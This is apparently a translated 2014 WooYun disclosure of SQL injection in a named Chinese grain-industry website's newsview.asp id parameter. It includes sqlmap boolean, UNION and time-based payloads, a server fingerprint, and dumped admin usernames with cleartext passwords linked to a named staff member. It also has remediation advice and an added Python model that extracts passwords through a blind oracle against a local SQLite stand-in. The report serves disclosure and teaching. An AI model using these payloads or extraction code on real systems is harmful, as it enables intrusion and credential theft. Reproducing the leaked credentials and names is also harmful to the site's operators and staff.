Vulnerability summary
Defect ID: wooyun-2014-068111
Title: SQL injection vulnerability on the main site of a Chinese industry association
Affected vendor: 中国粮食行业网 (China Grain Industry Network)
Author: 路人甲
Submitted: 2014-07-11 17:26
Fix deadline: 2014-08-25 17:28
Disclosed: 2014-08-25 17:28
Vulnerability type: SQL injection
Severity: High
Self-assessed rank: 15
Status: vendor could not be reached, or vendor actively ignored the report
Source: http://www.wooyun.org; for questions or help contact [email protected]
Tags: none
Vulnerability details
Disclosure status:
2014-07-11: Actively contacting the vendor and waiting for it to acknowledge the report; details withheld from the public
2014-08-25: Vendor has actively ignored the vulnerability; details disclosed to the public
Brief description:
The main site of a Chinese industry association is vulnerable to SQL injection
Detailed description:
http://www.chinagrains.org.cn/new/industry/newsview.asp?id=1 is vulnerable to SQL injection through the id parameter; the report states that the password hashes can be brute-forced, although the dump below shows the password column stored in the clear, so no cracking is actually needed.
Proof of concept (sqlmap output):
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 7712=7712
Type: UNION query
Title: Generic UNION query (NULL) - 10 columns
Payload: id=-1669 UNION ALL SELECT NULL,NULL,CHAR(113)+CHAR(117)+CHAR(101)+CHAR(117)+CHAR(113)+CHAR(100)+CHAR(65)+CHAR(100)+CHAR(97)+CHAR(118)+CHAR(66)+CHAR(72)+CHAR(102)+CHAR(68)+CHAR(117)+CHAR(113)+CHAR(104)+CHAR(104)+CHAR(120)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
Payload: id=1 AND 5014=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP
back-end DBMS operating system: Windows 7 Service Pack 1
back-end DBMS: active fingerprint: Microsoft SQL Server 2008
banner parsing fingerprint: Microsoft SQL Server 2008 R2 Service Pack 0 version 10.50.1600.1
banner:
---
Microsoft SQL Server 2008 R2 (RTM) - 10.50.1600.1 (X64)
Apr 2 2010 15:48:46
Copyright (c) Microsoft Corporation
Enterprise Edition (64-bit) on Windows NT 6.1 <X64> (Build 7601: Service Pack 1)
Database: zglx
Table: statuser
[2 entries]
+----+---------+---------+--------+---------+----------+----------+----------+----------+-----------------------------------+
| id | city    | note    | cname  | county  | province | username | corpname | password | user_right                        |
+----+---------+---------+--------+---------+----------+----------+----------+----------+-----------------------------------+
| 1  | <blank> | <blank> | 管理员  | <blank> | <blank>  | admin    | <blank>  | zglx2004 | 111111111111111100000000000000000 |
| 2  | 北京    | <blank> | zglx   | <blank> | 北京     | zglx     | <blank>  | zglx123  | 11001011111111000000000000000000  |
+----+---------+---------+--------+---------+----------+----------+----------+----------+-----------------------------------+
Database: zglx
Table: siteadmin
[1 entry]
+----+---------+--------+--------+----------+--------------+---------------------------------------------------------------------------+
| id | note    | dept   | cname  | username | password     | user_right                                                                |
+----+---------+--------+--------+----------+--------------+---------------------------------------------------------------------------+
| 6  | <blank> | 信息处  | 韩兆轩  | zglx2006 | zglx66033580 | 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 |
+----+---------+--------+--------+----------+--------------+---------------------------------------------------------------------------+
Remediation:
Filter keywords in the id parameter. Keyword filtering on its own is the weak form of the fix and is routinely bypassed with encoding and comment tricks; the reliable fix is to validate id as an integer and bind it as a parameter of a prepared query (ADODB.Command parameters in classic ASP) instead of concatenating it into the SQL text. The credentials recovered in the dump should also be rotated, and the password columns should hold salted hashes rather than cleartext.
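As an added worked example (not part of the original report, and not the site's own code), the following Python models the newsview.asp?id= handler against an in-memory SQLite stand-in seeded with the two statuser rows from the dump above. It shows how the boolean-based blind payload (id=1 AND 7712=7712) becomes a one-bit oracle that recovers the admin password one character at a time, how the UNION payload with a non-matching id of -1669 makes attacker-chosen rows render in place of the article, what the CHAR()-chain in the report's UNION payload decodes to, and how an integer-validated, parameter-bound handler defeats all of these payloads. The news table and its three columns, the hardened handler, and the SQLite spelling of SUBSTRING/ASCII are assumptions; the time-based heavy-query payload (a seven-way self-join of sysusers that merely slows MSSQL down) is not modelled.

```python
"""Model of the newsview.asp?id= injection from the report, run against an in-memory SQLite stand-in."""
import re
import sqlite3

# Constructed stand-in for the zglx database: an invented news table behind newsview.asp, plus the
# statuser rows exactly as they appear in the dump above. Not the real schema.
SCHEMA = """
CREATE TABLE news(id INTEGER PRIMARY KEY, title TEXT, body TEXT);
CREATE TABLE statuser(id INTEGER, username TEXT, password TEXT);
INSERT INTO news VALUES (1, 'constructed headline', 'constructed body');
INSERT INTO statuser VALUES (1, 'admin', 'zglx2004'), (2, 'zglx', 'zglx123');
"""

# The UNION payload from the sqlmap output, verbatim.
UNION_PAYLOAD = ("id=-1669 UNION ALL SELECT NULL,NULL,CHAR(113)+CHAR(117)+CHAR(101)+CHAR(117)+CHAR(113)"
                 "+CHAR(100)+CHAR(65)+CHAR(100)+CHAR(97)+CHAR(118)+CHAR(66)+CHAR(72)+CHAR(102)+CHAR(68)"
                 "+CHAR(117)+CHAR(113)+CHAR(104)+CHAR(104)+CHAR(120)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL--")


def open_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def newsview_vulnerable(conn, id_param):
    """Models the vulnerable page: the raw id query-string value is concatenated into the SQL text."""
    sql = "SELECT id, title, body FROM news WHERE id=" + id_param
    return conn.execute(sql).fetchall()


def newsview_fixed(conn, id_param):
    """Hardened handler (assumed, not the site's code): id must be a plain integer and is bound
    as a query parameter, never spliced into the SQL string."""
    if not re.fullmatch(r"[0-9]{1,9}", id_param):
        raise ValueError("id must be a positive integer")
    return conn.execute("SELECT id, title, body FROM news WHERE id=?", (int(id_param),)).fetchall()


def fixed_rejects(conn, id_param):
    """True if the hardened handler refuses the value (shows the report's payloads no longer work)."""
    try:
        newsview_fixed(conn, id_param)
        return False
    except ValueError:
        return True


def boolean_oracle(conn, condition):
    """One bit per request: does id=1 still render when `condition` is ANDed onto the WHERE clause?
    This is the signal behind the report's 'id=1 AND 7712=7712' boolean-based blind payload."""
    return len(newsview_vulnerable(conn, "1 AND (" + condition + ")")) == 1


def blind_extract(conn, column, table, where, max_len=32):
    """Recover a string column through the boolean oracle alone, 7 requests per character
    (binary search over the 7-bit code point). SQLite spelling; on MSSQL the same position
    would hold ASCII(SUBSTRING(...))."""
    out = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            cond = (f"(SELECT coalesce(unicode(substr({column},{pos},1)),0) "
                    f"FROM {table} WHERE {where}) > {mid}")
            if boolean_oracle(conn, cond):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:          # past the end of the string: substr() is empty, coalesce() gives 0
            break
        out += chr(lo)
    return out


def union_dump(conn):
    """The report's UNION technique against the stand-in: a non-matching id (-1669) empties the
    real result set, so attacker-chosen rows are all the page renders. The live target needed
    10 columns; the stand-in table has 3, so the SELECT list is shortened accordingly."""
    return newsview_vulnerable(conn, "-1669 UNION ALL SELECT id, username, password FROM statuser")


def decode_char_chain(payload):
    """Decode sqlmap's CHAR(n)+CHAR(n)+... string (MSSQL spelling) into the text it injects:
    fixed delimiter markers around a random token, which sqlmap uses to locate its output in the page."""
    return "".join(chr(int(n)) for n in re.findall(r"CHAR\((\d+)\)", payload))


if __name__ == "__main__":
    db = open_db()
    print("oracle true :", boolean_oracle(db, "7712=7712"))
    print("oracle false:", boolean_oracle(db, "7712=7713"))
    print("blind admin password:", blind_extract(db, "password", "statuser", "username='admin'"))
    print("union dump:", union_dump(db))
    print("UNION marker decodes to:", decode_char_chain(UNION_PAYLOAD))
    print("fixed handler rejects payload:", fixed_rejects(db, "1 AND 7712=7712"))
```

Run it as a plain script; the blind extraction needs only the true/false difference in whether the article renders, which is exactly why the report could pull the cleartext password column without any error messages from the server.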
Copyright notice: when reproducing, credit the source as 路人甲@乌云
Vulnerability response
Vendor response:
Unable to contact the vendor, or the vendor actively declined to respond